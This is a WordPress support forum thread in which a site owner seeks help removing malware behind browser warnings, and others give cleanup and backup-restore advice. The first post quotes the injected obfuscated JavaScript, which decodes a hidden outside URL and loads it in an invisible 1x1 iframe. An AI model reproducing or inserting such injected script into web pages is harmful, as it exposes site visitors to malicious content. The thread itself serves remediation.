WordPress.org

Ready to get started?Download WordPress

Forums

Malware Problem (18 posts)

  1. ajay182
    Member
    Posted 3 years ago #

    Hi guys,

    Getting alerts from firefox whenever accessing my site (http://overratingtheunderrated.com) about badware/malware. I've found out through another forum that there is some bad code, but they haven't told me where/how to find and delete it. Can anyone advise?

    This is the code: <script> function getfncelement(a) { if (a==0) return 'A104A116A116A112A58A47A47A99A108A101A97A110A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47'; if (a==1) return 'split'; if (a==2) return 'fromCharCode'; if (a==3) return 'IFRAME'; if (a==4) return 1; } var gnitssssssssssssssssss = String;

    var a_bnMJnWIagV = getfncelement(0);
    var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)](“A”);
    var a_LEdeDyQRPa = "";
    for (var a_frOsBBOKcu=1; a_frOsBBOKcu<a_ErVOWoUayU.length; a_frOsBBOKcu++)
    {a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_ErVOWoUayU[a_frOsBBOKcu]);}
    var testFrame = document.createElement(getfncelement(3));
    testFrame.src = a_LEdeDyQRPa;
    testFrame.width = getfncelement(4);
    testFrame.height = getfncelement(4);
    document.body.appendChild(testFrame);

  2. Michelle Langston
    Theme Wrangler at Automattic
    Posted 3 years ago #

    I suggest removing your theme and resetting it to the default Twenty-Ten theme. Then you could just download a new copy of WordPress and replace all of the existing files with the new ones. Go through all of your directories via FTP to make sure there is nothing suspicious there. Remove any files or folders that aren't part of WordPress or any other program that you KNOW you installed. Good luck!

  3. David Gwyer
    Member
    Posted 3 years ago #

    This could also be caused by a Plugin. Try deactivating all your Plugins then see if you still have the problem. Then (before deleting anything) switch your theme to the default theme (you might want to install the latest Twenty Ten version from the repo to be sure you switch to a clean theme).

    See if either of those do the trick..

  4. ajay182
    Member
    Posted 3 years ago #

    Hi,

    Would removing my theme not result in losing all of my current theme options and such?

    Also, I'm quite new at all this sort of stuff, I'm not sure what it is that I should be looking for-ie, what is out of the ordinary.

  5. David Gwyer
    Member
    Posted 3 years ago #

    Yes it could do that is why I said don't delete anything yet! You don't need to right away, you can switch themes without deleting your current one (just make another one the active theme).

  6. Michelle Langston
    Theme Wrangler at Automattic
    Posted 3 years ago #

    Yeah, try what dgwyer suggests first. You can reset your theme to the default one without losing any of your settings. Theme settings are stored in the database, so they are not affected by the actual theme files on the server.

  7. ajay182
    Member
    Posted 3 years ago #

    Hi,

    I've deactivated all plugins and changed theme but it is still showing up as a malware site.

  8. David Gwyer
    Member
    Posted 3 years ago #

    Even if you have cleaned out your code, it might still be flagged as malware in the browser because it has been temporarily blocked by Google(?).

  9. ajay182
    Member
    Posted 3 years ago #

    How would I be able to confirm I have in fact cleaned out the code though? Nothing has changed between now and then.

  10. ajay182
    Member
    Posted 3 years ago #

    I've lodged a request with google to reinstate me, but I'm not sure how to test whether the reinstalls etc actually got rid of the code.

  11. Delete the .maintenance file at root.

    You're getting a malware warning because you've been hacked:
    http://www.google.com/safebrowsing/diagnostic?site=overratingtheunderrated.com

    A GoDaddy restore won't necessarily fix that.

    See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress

    And

  12. ajay182
    Member
    Posted 3 years ago #

    Hi,

    I've checked the Google webmaster link, that was where I got the code in the OP from. I've checked those links and have taken many of those steps already. It seems the only one I haven't done is restored it to a backup version.

  13. ajay182
    Member
    Posted 3 years ago #

    Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Also, questions if I do have to restore a backup:

    -How do I do it?
    -Will I lose the extensive customisation on my theme?
    -I know I have to reinstall plugins-does that mean I lose statistics associated with the plugins (e.g. WordPress stats, akismet stats etc)?

  14. Google diagnostic is now showing there are other infections, specifically a couple of trojans. Is there no way to erase them without restoring a backup?

    Follow the guides that songdogtech linked to.

    Also, questions if I do have to restore a backup:

    -How do I do it?

    Follow this guide:

    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Will I lose the extensive customisation on my theme?

    Not if they were backed up.

    I know I have to reinstall plugins-does that mean I lose statistics associated with the plugins (e.g. WordPress stats, akismet stats etc)?

    It's always a possibility. I'd call it a fair trade-off for a clean site.

  15. ajay182
    Member
    Posted 3 years ago #

    appreciate the reply. the backups were automated by a plugin and are in sql.gz format-are these the right backups? i'm being frightened by seeing backups in other formats hovering around!

  16. ajay182
    Member
    Posted 3 years ago #

    Hi all,

    Problem seems to be OK now, I assume one of your recommendations above fixed thing-many thanks! Are there any steps I can take to secure my site?

  17. Yes, you'll probably want to implement some (if not all) of the recommended security measures.

  18. kickoff3pm
    Member
    Posted 3 years ago #

    I recently had this, not sure but found some code at the top of an old ceche file I left in the wpcontent root. I had also left the ceche statements in the htaccess file so I assume it would be possible to piggy back those ceche files and redirect.

Topic Closed

This topic has been closed to new replies.

About this Topic